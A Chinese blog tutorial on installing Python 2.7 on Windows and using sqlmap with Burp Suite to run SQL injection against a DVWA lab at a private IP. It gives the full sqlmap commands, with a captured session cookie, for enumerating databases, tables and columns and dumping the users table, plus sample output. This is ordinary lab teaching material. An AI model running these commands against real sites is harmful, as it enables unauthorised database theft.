• sqlmap之python环境部署与sql注入


    Python 环境部署
    找到 python官网https://www.python.org   

    下载    python-2.7.15.amd64.msi
    复制到C盘进行安装,Python27是python的默认安装目录
    安装后的目录 C:Python27

    1、修改系统环境变量 快速执行 python
    计算机 右键--属性--高级系统设置--环境变量

    找到 path ,编辑 在尾部增加 ;C:Python27

    重新打开 cmd 输入 python - v   显示python版本说明安装成功
    退出 exit()

    2、安装SQL map
    找到sqlmap官网sqlmap.org下载sqlmap-master.zip 

     解压到当前文件夹
    将 sqlmap-master 文件夹 复制到 c:

    运行 SQL map
    C:UsersAdministrator>cd c:sqlmap-master
    c:sqlmap-master>dir
    c:sqlmap-master>sqlmap.py
    3、使用 SQL map 进行SQL注入
    cookies 安全级别,会话id(身份验证)
    win2008 打开火狐访问 http://192.168.10.130/dvwa/ ,安全级别 修改为 low
    访问 SQL injection
    burpsuite 开启拦截功能 intercept is on
    在 SQl injection 输入 1 点击 submit 提交查询
    检查 burpsuite 是否拦截到数据

    通过 burpsuite 拦截的有用信息
    GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
    Referer: http://192.168.10.130/dvwa/vulnerabilities/sqli/
    Cookie: security=low; PHPSESSID=r1nn6op15b3nradki0kv1rgk46

    拼接 URL
    http://192.168.10.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit

    生成SQL map 命令
    sqlmap.py -u "http://192.168.10.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=r1nn6op15b3nradki0kv1rgk46" -p id --batch
    选项 -u 指定 URL, -p 指定sql 注入点, --batch 自动注入

    成功获取到 操作系统(windows), 数据库(Mysql), 网页开发语言(PHP), web服务 (apache)
    [16:30:41] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: PHP 5.4.45, Apache 2.4.23
    back-end DBMS: MySQL >= 5.0

    4、获取数据库信息
    按上键,在命令尾部 增加选项 --dbs
    available databases [5]:
    [*] dvwa
    [*] information_schema
    [*] mysql
    [*] performance_schema
    [*] test

    5、获取数据库表的信息
    更换选项 使用 -D 指定数据库名 使用 --tables 获取 数据库的所有表
    删除 --dbs, 更换为 -D dvwa --tables
    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users |
    +-----------+
    6、查询 users 表中所有字段
    更换选项 -T 指定表名 --columns 指定 字段
    删除 --tables , 更换为 -T users --columns

    Table: users
    [8 columns]
    +--------------+-------------+
    | Column | Type |
    +--------------+-------------+
    | user | varchar(15) |
    | avatar | varchar(70) |
    | failed_login | int(3) |
    | first_name | varchar(15) |
    | last_login | timestamp |
    | last_name | varchar(15) |
    | password | varchar(32) |
    | user_id | int(6) |
    +--------------+-------------+
    7、查询 库 dvwa 表 users 所有数据
    --dump 获取表中所有数据
    删除 --columns 改为 --dump 获取 表中所有数据

    六、SQL map 注入过程:
    1、win2008 打开火狐访问 http://192.168.10.130/dvwa/ ,安全级别 修改为 low
    2、访问 SQL injection
    3、burpsuite 开启拦截功能 intercept is on
    4、在 SQl injection 输入 1 点击 submit 提交查询
    5、检查 burpsuite 是否拦截到数据
    6、通过 burpsuite 拦截的有用信息
    GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
    Referer: http://192.168.10.130/dvwa/vulnerabilities/sqli/
    Cookie: security=low; PHPSESSID=r1nn6op15b3nradki0kv1rgk46
    7、命令拼接
    sqlmap.py -u "http://192.168.10.130/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=r1nn6op15b3nradki0kv1rgk46" -p id --batch
    选项 -u 指定 URL, -p 指定sql 注入点, --batch 自动注入

    8、获取数据库信息
    按上键,在命令尾部 增加选项 --dbs

    9、获取数据库表的信息
    更换选项 使用 -D 指定数据库名 使用 --tables 获取 数据库的所有表
    删除 --dbs, 更换为 -D dvwa --tables

    10、查询 users 表中所有字段
    更换选项 -T 指定表名 --columns 指定 字段
    删除 --tables , 更换为 -T users --columns

    11、查询 库 dvwa 表 users 所有数据
    --dump 获取表中所有数据
    删除 --columns 改为 --dump 获取 表中所有数据

    点击电脑右键属性,选择高级系统设置,选择环境变量,选择系统变量,选择path,增加python安装路径保存

    至此完成环境配置
    C:Python27是python2.7默认安装目录,使windons可以在cmd中使用python命令。
    C:Python27Scripts使windows在cmd可以使用pip命令。
    pip是安装python第三方库,软件的命令。

  • 相关阅读:
    html页面3秒后自动跳转的方法有哪些
    web前端教程之javascript创建对象的方法
    想学好web前端,需要看哪些书籍
    码农只能干到30岁的说法可信吗?
    不管你以后写不写JS,都应该学会这种思考方式
    Python基础知识之排序法
    input和textarea修改placeholder颜色和字号
    关于IE和Firefox兼容性问题及解决办法
    vue-cli构建vue项目
    js 小数取整的函数
  • 原文地址:https://www.cnblogs.com/dxp5201/p/15130838.html
Copyright © 2020-2023  润新知